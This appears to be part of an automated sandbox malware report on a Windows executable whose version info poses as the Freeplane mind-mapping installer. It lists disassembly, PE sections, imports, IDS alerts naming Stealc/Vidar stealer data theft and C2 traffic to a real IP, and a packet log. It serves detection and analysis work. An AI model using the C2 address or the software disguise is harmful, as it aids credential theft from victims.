mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007FF3E4B17229h
mov eax, 00000000h
jmp 00007FF3E4B1728Fh
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007FF3E4B17227h
call 00007FF3E4B17319h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007FF3E4B17243h
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 04h
mov dword ptr [edi], 00432940h
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
mov ecx, dword ptr [esp+04h]
mov edx, dword ptr [ecx]
mov eax, esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x190000	0x3ac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a0000	0x5c05	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x189a00	0x2868	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x191000	0xd8b6	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x166020	0x98	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa2119	0xa2200	3e0f1c1dd0beee8deb1fe26ca3f9c9ab	False	0.44783032960678487	DIY-Thermocam raw data (Lepton 3.x), scale 2048-0, spot sensor temperature 0.000000, unit celsius, color scheme 12, calibration: offset 0.000000, slope 1456.468750	6.0873329977202735	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa4000	0xc1d20	0xc1e00	4545370678c59c6ff77c20b706c55c92	False	0.4594276374113475	data	5.930698668175639	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x166000	0x29a38	0x11800	43518dc5b09e572ab65b7011956d69b5	False	0.3796595982142857	data	4.726087869251796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x190000	0x3ac	0x400	a23bf7397cfebcb76bf800aaad656288	False	0.47265625	data	4.46886203222975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x191000	0xd8b6	0xda00	f53219cb2f5b082dbd62dfc80db896db	False	0.5738424598623854	data	6.501822236979319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x19f000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x1a0000	0x5c05	0x5e00	5f3b460b52622ac42b74a9cdc40ef9ac	False	0.3373503989361702	data	4.79175574230714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a0528	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colors	English	United States	0.6317567567567568
RT_ICON	0x1a0650	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.5823699421965318
RT_ICON	0x1a0bb8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colors	English	United States	0.5120967741935484
RT_ICON	0x1a0ea0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States	0.5509927797833934
RT_ICON	0x1a1748	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.36341463414634145
RT_ICON	0x1a1db0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.42350746268656714
RT_STRING	0x1a2c58	0x360	data			0.34375
RT_STRING	0x1a2fb8	0x260	data			0.3256578947368421
RT_STRING	0x1a3218	0x45c	data			0.4068100358422939
RT_STRING	0x1a3674	0x40c	data			0.3754826254826255
RT_STRING	0x1a3a80	0x2d4	data			0.39226519337016574
RT_STRING	0x1a3d54	0xb8	data			0.6467391304347826
RT_STRING	0x1a3e0c	0x9c	data			0.6410256410256411
RT_STRING	0x1a3ea8	0x374	data			0.4230769230769231
RT_STRING	0x1a421c	0x398	data			0.3358695652173913
RT_STRING	0x1a45b4	0x368	data			0.3795871559633027
RT_STRING	0x1a491c	0x2a4	data			0.4275147928994083
RT_RCDATA	0x1a4bc0	0x10	data			1.5
RT_RCDATA	0x1a4bd0	0x2c4	data			0.6384180790960452
RT_RCDATA	0x1a4e94	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0x1a4ec0	0x5a	data	English	United States	0.7333333333333333
RT_VERSION	0x1a4f1c	0x584	data	English	United States	0.30807365439093487
RT_MANIFEST	0x1a54a0	0x765	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39091389329107235

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Version Infos

Description	Data
Comments	This installation was built with Inno Setup.
CompanyName	Open source
FileDescription	Free mind mapping software. Fast. Simple. Streamlined.
FileVersion
LegalCopyright	Copyright 2000-2025 Freeplane team and others
OriginalFileName
ProductName	Freeplane
ProductVersion	1.12.10
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-19T20:56:08.143493+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.4	49737	116.202.180.73	443	TCP
2025-02-19T20:56:09.493834+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.4	49738	116.202.180.73	443	TCP
2025-02-19T20:56:10.872515+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.202.180.73	443	192.168.2.4	49739	TCP
2025-02-19T20:56:12.249750+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.202.180.73	443	192.168.2.4	49740	TCP
2025-02-19T20:56:13.740264+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49741	116.202.180.73	443	TCP
2025-02-19T20:56:14.704890+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49742	116.202.180.73	443	TCP
2025-02-19T20:56:23.562734+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49769	116.202.180.73	443	TCP
2025-02-19T20:56:24.037491+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49771	116.202.180.73	443	TCP
2025-02-19T20:56:24.037491+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49771	116.202.180.73	443	TCP
2025-02-19T20:56:25.004113+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49773	116.202.180.73	443	TCP
2025-02-19T20:56:25.004113+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49773	116.202.180.73	443	TCP
2025-02-19T20:56:26.030925+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49774	116.202.180.73	443	TCP
2025-02-19T20:56:26.030925+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49774	116.202.180.73	443	TCP
2025-02-19T20:56:27.775991+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49775	116.202.180.73	443	TCP
2025-02-19T20:56:28.080440+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49776	116.202.180.73	443	TCP
2025-02-19T20:56:28.080440+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49776	116.202.180.73	443	TCP
2025-02-19T20:56:29.127631+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49777	116.202.180.73	443	TCP
2025-02-19T20:56:29.127631+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49777	116.202.180.73	443	TCP
2025-02-19T20:56:30.168658+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49778	116.202.180.73	443	TCP
2025-02-19T20:56:30.168658+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49778	116.202.180.73	443	TCP
2025-02-19T20:56:31.220561+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49779	116.202.180.73	443	TCP
2025-02-19T20:56:31.220561+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49779	116.202.180.73	443	TCP
2025-02-19T20:56:32.194870+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49780	116.202.180.73	443	TCP
2025-02-19T20:56:32.194870+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49780	116.202.180.73	443	TCP
2025-02-19T20:56:34.383954+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49781	116.202.180.73	443	TCP
2025-02-19T20:56:34.383954+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49781	116.202.180.73	443	TCP
2025-02-19T20:56:48.568422+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58946	116.202.180.73	443	TCP
2025-02-19T20:56:49.574085+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58947	116.202.180.73	443	TCP
2025-02-19T20:56:50.417279+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58948	116.202.180.73	443	TCP
2025-02-19T20:56:51.494106+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58949	116.202.180.73	443	TCP
2025-02-19T20:56:52.575909+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58950	116.202.180.73	443	TCP
2025-02-19T20:56:53.621712+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58951	116.202.180.73	443	TCP
2025-02-19T20:56:54.634996+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58952	116.202.180.73	443	TCP
2025-02-19T20:56:55.792458+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58953	116.202.180.73	443	TCP
2025-02-19T20:56:56.776644+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58954	116.202.180.73	443	TCP
2025-02-19T20:56:57.764421+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58955	116.202.180.73	443	TCP
2025-02-19T20:56:58.655129+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58956	116.202.180.73	443	TCP
2025-02-19T20:57:00.943036+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58958	116.202.180.73	443	TCP
2025-02-19T20:57:02.058380+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58959	116.202.180.73	443	TCP
2025-02-19T20:57:03.149537+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	58961	116.202.180.73	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2025 20:56:04.176510096 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:04.176565886 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:04.176640987 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:04.208543062 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:04.208590031 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.005676985 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.005956888 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.056783915 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.056849957 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.057097912 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.060985088 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.064769030 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.107330084 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.284046888 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.284070969 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.284111023 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.284131050 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.284159899 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.284205914 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.286449909 CET	49735	443	192.168.2.4	149.154.167.99
Feb 19, 2025 20:56:05.286473989 CET	443	49735	149.154.167.99	192.168.2.4
Feb 19, 2025 20:56:05.309175014 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:05.309216976 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:05.309297085 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:05.310060978 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:05.310076952 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.324815989 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.324935913 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.345566034 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.345608950 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.346502066 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.346574068 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.347132921 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.387348890 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.799406052 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.799561977 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.799618006 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.799654007 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.802695990 CET	49736	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.802711964 CET	443	49736	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.823003054 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.823035002 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:06.823318958 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.823436975 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:06.823446989 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:07.193887949 CET	49675	443	192.168.2.4	173.222.162.32
Feb 19, 2025 20:56:07.478899002 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:07.479116917 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:07.479907990 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:07.479913950 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:07.481758118 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:07.481761932 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.143465042 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.143665075 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.143683910 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.143759966 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.143908024 CET	49737	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.143924952 CET	443	49737	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.173801899 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.173841953 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.173949003 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.174313068 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.174329996 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.829574108 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.829756975 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.863132954 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.863146067 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:08.877458096 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:08.877470016 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.493748903 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.493809938 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.493817091 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.493837118 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.493854046 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.493882895 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.493887901 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.493930101 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.493969917 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.494015932 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.494103909 CET	49738	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.494117022 CET	443	49738	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.518117905 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.518153906 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:09.518275023 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.518415928 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:09.518426895 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.196610928 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.196696997 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.197158098 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.197164059 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.198643923 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.198647976 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.872354031 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.872376919 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.872438908 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.872517109 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.872517109 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.872517109 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.872745991 CET	49739	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.872759104 CET	443	49739	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.900101900 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.900130033 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:10.900202990 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.900453091 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:10.900465012 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:11.577745914 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:11.577816963 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:11.613775969 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:11.613795042 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:11.616264105 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:11.616269112 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.249610901 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.249672890 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.249711990 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.249865055 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.250097990 CET	49740	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.250112057 CET	443	49740	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.292259932 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.292304993 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.292423964 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.292714119 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.292731047 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.974087000 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.974283934 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.975039959 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.975049019 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.976865053 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.976870060 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:12.976952076 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:12.976965904 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.291130066 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.291156054 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.291218042 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.291549921 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.291562080 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.740310907 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.740494013 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.740591049 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.740921974 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.742860079 CET	49741	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.742883921 CET	443	49741	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.962233067 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.962352991 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.962937117 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.962944031 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:13.977138042 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:13.977143049 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:14.704917908 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:14.705008984 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:14.705193996 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:14.705193996 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:14.832544088 CET	49742	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:14.832570076 CET	443	49742	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:16.989461899 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:16.989557028 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:16.989645958 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:16.990004063 CET	49748	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:16.990029097 CET	443	49748	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.296857119 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.296952963 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.297053099 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.297250986 CET	49749	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.297272921 CET	443	49749	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.343090057 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.343168974 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.343249083 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.344074965 CET	49750	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:17.344106913 CET	443	49750	172.217.16.196	192.168.2.4
Feb 19, 2025 20:56:17.566195965 CET	49751	443	192.168.2.4	172.217.16.196
